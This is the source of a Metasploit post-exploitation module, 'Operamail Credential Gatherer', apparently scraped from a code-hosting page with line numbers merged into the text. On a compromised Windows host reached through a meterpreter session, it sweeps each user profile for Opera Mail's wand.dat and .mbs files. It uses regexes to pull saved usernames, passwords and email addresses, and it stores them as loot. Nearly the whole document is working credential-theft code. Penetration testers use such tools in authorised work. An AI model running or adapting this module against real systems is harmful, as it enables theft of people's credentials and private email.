Path: blob/master/modules/post/windows/gather/credentials/operamail.rb
19567 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post67include Msf::Post::File8include Msf::Post::Windows::UserProfiles9include Msf::Post::Windows::Packrat10ARTIFACTS =11{12application: 'operamail',13app_category: 'emails',14gatherable_artifacts: [15{16filetypes: 'chats_image',17path: 'AppData',18dir: 'Opera Mail',19artifact_file_name: 'wand.dat',20description: "Opera-Mail's saved Username and Passwords",21credential_type: 'text',22regex_search: [23{24extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',25extraction_type: 'credentials',26regex: [27'(?i-mx:password.*)',28'(?i-mx:username.*)'29]30},31{32extraction_description: 'searches for Email TO/FROM address',33extraction_type: 'Email addresses',34regex: [35'(?i-mx:to:.*)',36'(?i-mx:from:.*)'37]38}39]40},41{42filetypes: 'email_logs',43path: 'LocalAppData',44dir: 'Opera Mail',45artifact_file_name: '*.mbs',46description: "Opera-Mail's Emails",47credential_type: 'text',48regex_search: [49{50extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',51extraction_type: 'credentials',52regex: [53'(?i-mx:password.*)',54'(?i-mx:username.*)'55]56},57{58extraction_description: 'searches for Email TO/FROM address',59extraction_type: 'Email addresses',60regex: [61'(?i-mx:to:.*)',62'(?i-mx:from:.*)'63]64}65]66}67]68}.freeze6970def initialize(info = {})71super(72update_info(73info,74'Name' => 'Operamail Credential Gatherer',75'Description' => %q{76This module searches for Operamail credentials on a Windows host.77},78'License' => MSF_LICENSE,79'Author' => [80'Kazuyoshi Maruta',81'Daniel Hallsworth',82'Barwar Salim M',83'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org84],85'Platform' => ['win'],86'SessionTypes' => ['meterpreter'],87'Notes' => {88'Stability' => [CRASH_SAFE],89'Reliability' => [],90'SideEffects' => []91}92)93)9495register_options(96[97OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),98OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),99OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),100# enumerates the options based on the artifacts that are defined below101OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])102]103)104end105106def run107print_status('Filtering based on these selections: ')108print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")109print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")110print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")111112# used to grab files for each user on the remote host113grab_user_profiles.each do |userprofile|114run_packrat(userprofile, ARTIFACTS)115end116117print_status 'PackRat credential sweep completed'118end119end120121122